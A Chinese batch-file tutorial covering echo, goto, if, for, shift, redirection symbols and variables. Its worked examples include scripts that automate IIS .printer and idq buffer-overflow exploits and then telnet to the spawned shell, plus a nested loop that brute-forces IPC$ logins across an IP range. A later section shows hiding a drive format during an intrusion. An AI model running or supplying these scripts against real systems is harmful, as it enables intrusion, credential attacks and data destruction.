精华内容
下载资源
问答
  • bat批处理命令大全
    千次阅读
    2021-09-26 21:12:51
    bat 批处理
    一、批处理中常用命令:
    @命令 :
    	加在每个命令行的最前面,表示运行时不显示这一行的命令行。
    	eg: @echo off // 不显示后续命令行及当前命令行
    
    at
    	at 05:30 shutdown -s -f       表示5:30分自动关机
    
    attrib  设置文件属性
    	ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [[drive:] [path] filename] [/S [/D]]
    	+ 设置属性。
    	- 清除属性。
    	R 只读文件属性。
    	A 存档文件属性。
    	S 系统文件属性。
    	H 隐藏文件属性。
    	[drive:][path][filename] 指定要处理的文件属性。
    	/S 处理当前文件夹及其子文件夹中的匹配文件。
    	/D 也处理文件夹。     /d 必需和/s一起使用
    	eg: attrib –h d:\ pagefile.sys   消除d:\ pagefile.sys的“隐藏”属性。
    
    call 命令:
    	调用另一个批处理文件(如果不用 call 而直接调用别的批处理文件,那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令)。
    格式:CALL [drive:][path]filename [batch-parameters]   
    参数:[drive:][path]filename指定要调用的批处理程序的名字及其存放处。文件名必须用.BAT作扩展名。
      	batch-parameters指定批处理程序所需的命令行信息
    
    cd 目录切换命令
    	cd ..
    
    copy(复制文件)  
    	eg: copy c:\123 d:\abc
    	eg: copy /b d:\1.mp3+d:\2.mp3 e:\3.mp3  把1和2合并到3
    
    xcopy(复制文件夹)
    	/s  复制非空的目录和子目录。
    	/E 复制所有子目录,包括空目录。
    	/H 复制具有隐藏和系统文件属性的
    更多相关内容
  • bat批处理命令大全.doc

    2022-04-14 12:54:40
    bat批处理命令大全
  • bat批处理命令大全 [bat怎么批处理命令来清理windows7系统垃圾文件] .docx
  • bat批处理命令大全(翻译转载)

    千次阅读 2020-08-28 14:06:49
    echo、@、call、pause、rem 是批处理文件最常用的几个命令,我们就从他们开始学起。echo 表示显示此命令后的字符 echo off 表示在此语句后所有运行的命令都不显示命令行本身 @ 与echo off相象,但它是加在其它命令行...

    从简单学起

    echo、@、call、pause、rem 是批处理文件最常用的几个命令,我们就从他们开始学起。 echo 表示显示此命令后的字符 
    echo off 表示在此语句后所有运行的命令都不显示命令行本身 
    @ 与echo off相象,但它是加在其它命令行的最前面,表示运行时不显示命令行本身。 
    call 调用另一条批处理文件(如果直接调用别的批处理文件 ,执行完那条档后将无法执行当前档后续命令) 
    pause 运行此句会暂停,显示Press any key to continue... 等待用户按任意键后继续 
    rem 表示此命令后的字符为解释行,不执行,只是给自己今后查找用的

     

    批处理命令大全(一)第一部分:批处理的专用命令

     

    批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT。这些命令统称批处理命令,下面我就来给大家介绍一下批处理的命令。

    1、       REM

    REM 是个注释命令一般是用来给程序加上注解的,该命令后的内容在程序执行的时候将不会被显示和执行。例:

    REM 你现在看到的就是注解,这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。

     

    2、       ECHO

    ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例:

    Echo off

    Rem 以上代表关闭回显即不显示所执行的命令

    Echo 这个就是消息。

    Rem 以上代表显示“这就是消息”这列字符

    执行结果:

    C:\>ECHO.BAT

    这个就是消息。

     

    3、       GOTO

    GOTO 即为跳转的意思。在批处理中允许以“:XXX”来构建一个标号然后用GOTO :标号直接来执行标号后的命令。例

    :LABEL

    REM 上面就是名为LABEL的标号。

    DIR C:\

    DIR D:\

    GOTO LABEL

    REM 以上程序跳转标号LABEL处继续执行。

     

    4、CALL

    CALL 命令可以在批处理执行过程中调用另一个批处理,当另一个批处理执行完后再继续执行原来的批处理。例:

    批处理2.BAT内容如下:

    ECHO 这就是2的内容

    批处理1.BAT内容如下:

    ECHO 这是1的内容

    CALL 2.BAT

    ECHO 1和2的内容全部显示完成

    执行结果如下:

            C:\>1.BAT

            这是1的内容

    这就是2的内容

            1和2的内容全部显示完成

     

    5、PAUSE

    PAUSE 停止系统命令的执行并显示下面的内容。例:

    C:\> PAUSE

    请按任意键继续 . . .

     

    6、       IF

    IF 条件判断语句,语法格式如下:

    IF [NOT] ERRORLEVEL number command

    IF [NOT] string1==string2 command

    IF [NOT] EXIST filename command

    说明:

    [NOT] 将返回的结果取反值即“如果没有”的意思。

    ERRORLEVEL 是命令执行完成后返回的退出值

    Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。

    string1==string2 string1和string2都为字符的数据,英文字符的大小写将看做不同,这个条件中的等于号必须是2个(绝对相等),条件想等后即执行后面的 command

    EXIST filename 为文件或目录存在的意思。

    IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。

    例:

    1、       IF [NOT] ERRORLEVEL number command

    检测命令执行完后的返回值做出判断。

    echo off

    dir z:

    rem 如果退出代码为1(不成功)就跳至标题1处执行

    IF ERRORLEVEL 1 goto 1

    rem 如果退出代码为0(成功)就跳至标题0处执行

    IF ERRORLEVEL 0 goto 0

    :0

    echo 命令执行成功!

    Rem 程序执行完毕跳至标题exit处退出

    goto exit

    :1

    echo 命令执行失败!

    Rem 程序执行完毕跳至标题exit处退出

    goto exit

    :exit

    Rem 这里是程序的出口

    2、       IF string1==string2 command

    检测当前变量的值做出判断

    ECHO OFF

    IF %1==2 goto no

    Echo 变数相等!

    Goto exit

    :no

    echo 变数不相等

    goto exit

    :exit

    大家可以这样看效果 C:\>test.bat 数字

     

    3、       IF [NOT] EXIST filename command

    发现特定的文件做出判断

    echo off

    IF not EXIST autoexec.bat goto 1

    echo 文件存在成功!   

    goto exit

    :1

    echo 檔不存在失败!

    goto exit

    :exit

    这个批处理大家可以放在c盘和d盘分别执行看看效果。

    7、       FOR

    FOR这个命令比较特殊是一个循环执行命令的命令,同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了,后面再来讲解套用的循环。在批处理中FOR的命令如下:

    FOR [%%c] IN (set) DO [command] [arguments]

    在命令行中命令如下:

    FOR [%c] IN (set) DO [command] [arguments]

    常用参数:

    /L 该集表示以增量形式从开始到结束的一个数字序列。因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生序列 (5 4 3 2 1)。

    /D 如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。

     

    /F 从指定的文件中读取数据作为变量

    eol=c         - 指一个行注释字符的结尾(就一个)

    skip=n         - 指在檔开始时忽略的行数。

    delims=xxx       - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。

    tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号,那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。

    usebackq       - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。

    下面来看一个例子:

    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

    会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或空格定界符号。请注意,这个 for 程序体的语句引用 %i 来取得第二个符号,引用 %j 来取得第三个符号,引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名,您需要用双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebackq 选项,否则,双引号会被理解成是用作定义某个要分析的字符串的。

    %i 专门在 for 语句中得到说明,%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号,只要不试图说明一个高于字母 'z' 或'Z' 的变数。请记住,FOR 变量名分大小写,是通用的;而且,同时不能有 52 个以上都在使用中。

    您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。这样,该字符串会被当作一个檔中的一个单一输入行。最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进内存,并被当作文件分析。因此,以下例子:

    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

    会枚举当前环境中的环境变量名称。

    以下列举一个简单的例子,他将说明参数/L和没有参数的区别:

    删除档1.TXT 2.TXT 3.TXT 4.TXT 5.TXT

    例:

    ECHO OFF

    FOR /L %%F IN (1,1,5) DO DEL %%F.TXT

    FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT

    以上2条命令执行的结果都是一样的如下:

    C:\>DEL 1.TXT

    C:\>DEL 2.TXT

    C:\>DEL 3.TXT

    C:\>DEL 4.TXT

    C:\>DEL 5.TXT

     

    8、       SETLOCAL

    开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后

    所做的环境改动只限于批处理文件。要还原原先的设置,必须执

    行 ENDLOCAL。 达到批处理文件结尾时,对于该批处理文件的每个

    尚未执行的 SETLOCAL 命令,都会有一个隐含的 ENDLOCAL 被

    执行。例:

    @ECHO OFF

    SET PATH         /*察看环境变量PATH

    PAUSE

    SETLOCAL

    SET PATH=E:\TOOLS       /*重新设置环境变量PATH

    SET PATH

    PAUSE

    ENDLOCAL

    SET PATH

    从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E:\TOOLS后显示为E:\TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。

     

    9、       SHIFT

    SHIFT命令可以让在命令上的的命令使用超过10个(%0~%9)以上的可替代参数例:

    ECHO OFF

    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

    SHIFT

    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

    SHIFT

    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

    执行结果如下:

    C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

    1 2 3 4 5 6 7 8 9

    2 3 4 5 6 7 8 9 10

    3 4 5 6 7 8 9 10 11

    以上就是基于WIN2000下的9个批处理命令。批处理命令大全(二)2007-05-10 11:49第二部分:特殊的符号与批处理

     

    在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。

    1、      符号(@)

    @在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求

    2、      符号(>)

    >的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围(后面可是文件也可是默认的系统控制台)例:

    文件1.txt的檔内容为:

    1+1

    使用命令c:\>dir *.txt >1.txt

    这时候1.txt的内容如下

    驱动器 C 中的卷没有标签。

    卷的序列号是 301A-1508

    C:\ 的目录

    2003-03-11 14:04          1,005 FRUNLOG.TXT

    2003-04-04 16:38        18,598,494 log.txt

    2003-04-04 17:02            5 1.txt

    2003-03-12 11:43            0 aierrorlog.txt

    2003-03-30 00:35          30,571 202.108.txt

             5 个文件      18,630,070 字节

             0 个目录 1,191,542,784 可用字节

    >将命令执行的结果覆盖了原始的檔内容。

    在传递给控制台的时候程序将不会有任何回显(注意:这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显,这里的回显是程序执行中或后的回显)例:

    C:\>dir *.txt >nul

    程序将没有任何显示也不会产生任何痕迹。

    3、      符号(>>)

    符号>>的作用与符号>相似,但他们的区别在于>>是传递并在檔末尾追加>>也可将回显传递给控制台(用法同上)例:

    文件1.txt内同为:

    1+1

    使用命令c:\>dir *.txt >>1.txt

    这时候1.txt的内容如下

    1+1

    驱动器 C 中的卷没有标签。

    卷的序列号是 301A-1508

    C:\ 的目录

    2003-03-11 14:04          1,005 FRUNLOG.TXT

    2003-04-04 16:38        18,598,494 log.txt

    2003-04-04 17:02            5 1.txt

    2003-03-12 11:43            0 aierrorlog.txt

    2003-03-30 00:35          30,571 202.108.txt

             5 个文件      18,630,070 字节

             0 个目录 1,191,542,784 可用字节

    >>将命令执行的结果覆加在了原始的檔内容后面。

    4、      符号(|)

    |是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例:

    C:\>dir c:\|find "1508"

    卷的序列号是 301A-1508

    以上命令的意思为查找c:\的所有并发现1508字符串。Find的用法请用 find /?自行查看

    在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的

    echo y|fornat a: /s /q /v:system

    用过format命令的人都知道format有一个交互对化过程,要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的(这条命令有危害性,测试的时候请谨慎)

    5、      符号(^)

    ^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例:

    c:\>echo test ^> 1.txt

    test > 1.txt

    从上面可以看出并没有把test写入檔1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。

    6、      符号(&)

    &符号允许在一行中使用2个以上不同的命令,当第一个命令执行失败将不影响第2个命令的执行。例:

    c:\> dir z:\ &dir y:\ &dir c:\

    以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。

    7、      符号(&&)

    &&符号也是允许在一行中使用2个以上不同的命令,当第一个命令执行失败后后续的命令将不会再被执行。例:

    c:\> dir z:\ &&dir y:\ &&dir c:\

    以上的命令将会提示检查是否存在z:盘如果存在则执行,如果不存在则停止执行所有的后续命令

    8、      符号(" ")

    " "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例:

    c:\>cd “Program Files”

    c:\>cd progra~1

    c:\>cd pro*

    以上方法都可以进入Program Files目录

    9、      符号(,)

    ,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例:

    c:\>dir,c:\

    10、      符号(;)

    ;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例:

    DIR C:\;D:\;E:\F:\

    以上的命令相当于

    DIR C:\

    DIR D:\

    DIR E:\

    DIR F:\

    当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。

     

    批处理命令大全(三)第三部分:批处理与变数

     

    在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下:

    C::\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11

    SHIFT.BAT 1 2 3 4 5 6 7 8 9

    1 2 3 4 5 6 7 8 9 10

    2 3 4 5 6 7 8 9 10 11

    系统是如何区分每个变量的呢,系统区分变量的规则为字符串中间的空格,即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例:

    批处理内容为:

    ECHO %1

    ECHO %2

    ECHO %3

    输入命令:

    C:\>TEST “Program Files” Program Files

    Program Files

    Program

    Files

    在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢?在系统中还有一种变量称之为环境变量(使用SET命令可以查看当前系统的环境变量)如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候,我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用,环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子,批处理如下:

    ECHO OFF

    SET PASS=%1

    SHIFT

    SET PASS1=%1

    SHIFT

    ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9

    SHIFT

    ECHO %PASS% %PASS1% %9

    SET PASS=%PASS1%        变数的传递

    SET PASS1=%9

    SHIFT

    ECHO %PASS% %PASS1% %9

    使用命令:C:\>TEST A B 3 4 5 6 7 8 9 10 K L

    A B 3 4 5 6 7 8 9 10 K 注意:这一行显示了11个变量

    A B L          在使用了3次SHIFT之后%9变成了L

    B L            变量的传递后的结果

     

    批处理命令大全(四)第四部分:完整案例

     

    以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理,看看他们是怎么运作的。这里我将列举三个例子来详细分析,为了保持程序的完整我的注释会加在/*后面。

    例一

    这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为:

    iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为 开始版本号可有可无。程序如下。

    @echo off                /*关闭命令回显

    if "%1%"=="" goto help          /*判断%1是否为空,%1为目标ip

    if "%2%"=="1" goto 1            /*判断%2是否为1,为1则跳转标志1

    if "%2%"=="2" goto 2            /*%2为开始版本号,如果没有设置则

    if "%2%"=="3" goto 3            /*如果存在则从匹配的地方开始执行

    if "%2%"=="4" goto 4

    if "%2%"=="5" goto 5

    if "%2%"=="6" goto 6

    if "%2%"=="7" goto 7

    if "%2%"=="8" goto 8

    if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容

    ping %1 -n 1 | find "Received = 1" /*ping目标1次,从结果中发现Received = 1

    if errorlevel 1 goto error        /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行)

    iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接埠88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good)

    if not errorlevel 1 goto telnet      /*如果没有错误代码1(溢出成功)就执行telnet段的内容。

    echo 操作系统类型 9 失败!      /否则显示这一句

    :8                /*以下代码内容参照上面

    iis5hack %1 80 8 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 8 失败!

    :7

    iis5hack %1 80 7 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 7 失败!

    :6

    iis5hack %1 80 6 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 6 失败!

    :5

    iis5hack %1 80 5 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 5 失败!

    :4

    iis5hack %1 80 4 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 4 失败!

    :3

    iis5hack %1 80 3 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 3 失败!

    :2

    iis5hack %1 80 2 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 2 失败!

    :1

    iis5hack %1 80 1 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 1 失败!

    :0

    iis5hack %1 80 0 88 | find "good"

    if not errorlevel 1 goto telnet

    echo 操作系统类型 0 失败!

    goto error

    :telnet

    telnet %1 88              /*开始连接目标ip的88端口

    goto exit              /*连接中断后跳转exit段

    :error              /*error段显示错误后的帮助信息

    echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次!

    echo iis5hack [目标IP] [WEB端口] [系统类型] [开放埠]

    ECHO 中文:          0

    ECHO 中文+sp1:      1

    ECHO 英文:          2

    ECHO 英文+sp1:      3

    ECHO 日语:          4

    ECHO 日语+sp1:      5

    ECHO 韩文:          6

    ECHO 韩文+sp1:      7

    ECHO 墨西哥语:      8

    ECHO 墨西哥语+sp1:      9

    goto exit        /*跳转exit段

    :file          /*file段显示文件没有发现的信息

    echo 文件iis5hack.exe没有发现!程序终止运行!

    goto exit        /*跳转exit段

    :help          /*help段显示本批处理的使用格式帮助

    echo 本程序用法如下:

    echo iis [目标ip]

    echo iis [目标ip] [开始的号码9-0]

    :exit          /*exit段为程序出口

    这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大!

    例二

    这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下:

    运行参数: 操作系统类型 目的地址 web埠 1 溢出监听埠 <输入命令1>

    其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。

    其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下:

    @echo off              /*同例一

    if not EXIST iisidq.exe goto file      /*同例一

    if %1 == "" goto error          /*同例一

    ping %1 -n 1 | find "Received = 1"      /*同例一

    if errorlevel 1 goto error1        /*同例一

    set b=%1        /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip

    set a=0          /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。

    :no          /*no段开始

    if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。

    if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数器来控制其

    if %a%==2 set d=2 /*变动。

    if %a%==3 set d=3

    if %a%==4 set d=4

    if %a%==5 set d=5

    if %a%==6 set d=6

    if %a%==7 set d=7

    if %a%==9 set d=9

    if %a%==10 set d=13

    if %a%==11 set d=14

    goto 0          /*变量传递完成后转到标志0处运行

    :1

    echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候......

    :0            /*标志0开始

    IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good)

    if errorlevel 1 goto 1          /*如果没有good字符串则没有发送成跳

    /*转标志1处继续尝试发送

    ping 127.0.0.1 -n 8 >nul        /*ping自己8次相当于延时8秒不显示执

    /*行结果

    echo 正在执行第%d%项!        /*报告正在溢出的操作系统类型

    telnet %b% 99            /*连接溢出埠

    1.              /*显示一个空行

    if %d%==14 goto error1      /*如果操作系统类型为14则跳转error1处(循环出口)

    if %d%==13 set a=11          /*开始用计数器对操作系统代码重新附值

    if %d%==9 set a=10

    if %d%==7 set a=9

    if %d%==6 set a=7

    if %d%==5 set a=6

    if %d%==4 set a=5

    if %d%==3 set a=4

    if %d%==2 set a=3

    if %d%==1 set a=2

    if %d%==0 set a=1

    goto no                /*附值完成跳转no段执行

    :file                  /*以下都是出错后的帮助提示

    echo IIsidq.exe没有发现!将该文件和本文件放在同一目录!

    goto exit

    :error

    echo 错误!目标ip不可识别!请使用下面的格式连接!

    echo idq [目标IP]

    goto exit

    :error1

    echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至!

    echo 请按照下面的格式手工尝试!

    echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出埠]

    echo telnet [目标ip] [溢出埠]

    :exit                /*整个程序的出口

    这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。

    例三

    for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f

    上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为:C:\>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去,设密码为123 用户名为 abc)

    net usr \\218.0.0.1\ipc$ 123 /u:abc

     

    批处理命令2008-03-25 23:191.Echo 命令

    打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。

    语法

    echo [{on|off}] [message]

    Sample:echo off / echo hello world

    在实际应用中我们会把这条命令和复位向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的檔中.这将在以后的例子中体现出来。

     

    2.@ 命令

    表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。

    Sample:@echo off

    @echo Now initializing the program,please wait a minite...

    @format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)

     

    3.Goto 命令

    指定跳转到卷标,找到卷标后,程序将处理从下一行开始的命令。

    语法:goto label (label是参数,指定所要转向的批处理程序中的行。)

    Sample:

    if {%1}=={} goto noparms

    if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)

    @Rem check parameters if null show usage

    :noparms

    echo Usage: monitor.bat ServerIP PortNumber

    goto end

    标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是卷标,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

     

    4.Rem 命令

    注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。

    Rem Message

    Sample:@Rem Here is the description.

     

    5.Pause 命令

    运行 Pause 命令时,将显示下面的消息:

    Press any key to continue . . .

    Sample:

    @echo off

    :begin

    copy a:*.* d:\back

    echo Please put a new disk into driver A

    pause

    goto begin

    在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。

     

    6.Call 命令

    从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的卷标。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。

    语法

    call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

    参数

    [Drive:}[Path] FileName

    指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

     

    7.start 命令

    调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。

    入侵常用参数:

    MIN 开始时窗口最小化

    SEPARATE 在分开的空间内开始 16 位 Windows 程序

    HIGH 在 HIGH 优先级类别开始应用程序

    REALTIME 在 REALTIME 优先级类别开始应用程序

    WAIT 启动应用程序并等候它结束

    parameters 这些为传送到命令/程序的参数

    执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。

    8.choice 命令

    choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……

     

    如: choice /c:dme defrag,mem,end

    将显示

    defrag,mem,end[D,M,E]?

    Sample:

    Sample.bat的内容如下: 

    @echo off

    choice /c:dme defrag,mem,end

    if errorlevel 3 goto defrag (应先判断数值最高的错误码)

    if errorlevel 2 goto mem

    if errotlevel 1 goto end

     

    :defrag

    c:\dos\defrag

    goto end

    :mem

    mem

    goto end

    :end

    echo good bye

     

    此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。

     

    9.If 命令

     

    if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式: 

    1、if "参数" == "字符串" 待执行的命令

    参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)

    如if "%1"=="a" format a: 

    if {%1}=={} goto noparms

    if {%2}=={} goto noparms

     

    2、if exist 文件名 待执行的命令

    如果有指定的檔,则条件成立,运行命令,否则运行下一句。

    如if exist config.sys edit config.sys

     

    3、if errorlevel / if not errorlevel 数字 待执行的命令

    如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。

    如if errorlevel 2 goto x2 

    DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。

     

    10.for 命令

    for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。

    在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

     

    for {%variable|%%variable} in (set) do command [ CommandLineOptions]

    %variable 指定一个单一字母可替换的参数。

    (set) 指定一个或一组档。可以使用通配符。

    command 指定对每个檔执行的命令。

    command-parameters 为特定命令指定参数或命令行开关。

    在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

    而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

     

    如果命令扩展名被启用,下列额外的 FOR 命令格式会受到

    支持:

     

    FOR /D %variable IN (set) DO command [command-parameters]

     

    如果集中包含通配符,则指定与目录名匹配,而不与檔

    名匹配。

     

    FOR /R [[drive:]path] %variable IN (set) DO command [command-

     

    检查以 [drive:]path 为根的目录树,指向每个目录中的

    FOR 语句。如果在 /R 后没有指定目录,则使用当前

    目录。如果集仅为一个单点(.)字符,则枚举该目录树。

     

    FOR /L %variable IN (start,step,end) DO command [command-para

     

    该集表示以增量形式从开始到结束的一个数字序列。

    因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生

    序列 (5 4 3 2 1)。

     

    FOR /F ["options"] %variable IN (file-set) DO command

    FOR /F ["options"] %variable IN ("string") DO command

    FOR /F ["options"] %variable IN (command) DO command

     

    或者,如果有 usebackq 选项:

     

    FOR /F ["options"] %variable IN (file-set) DO command

    FOR /F ["options"] %variable IN ("string") DO command

    FOR /F ["options"] %variable IN (command) DO command

     

    filenameset 为一个或多个文件名。继续到 filenameset 中的

    下一个檔之前,每份檔都已被打开、读取并经过处理。

    处理包括读取檔,将其分成一行行的文字,然后将每行

    解析成零或更多的符号。然后用已找到的符号字符串变量值

    调用 For 循环。以默认方式,/F 通过每个檔的每一行中分开

    的第一个空白符号。跳过空白行。您可通过指定可选 "options"

    参数替代默认解析操作。这个带引号的字符串包括一个或多个

    指定不同解析选项的关键词。这些关键词为:

     

    eol=c - 指一个行注释字符的结尾(就一个)

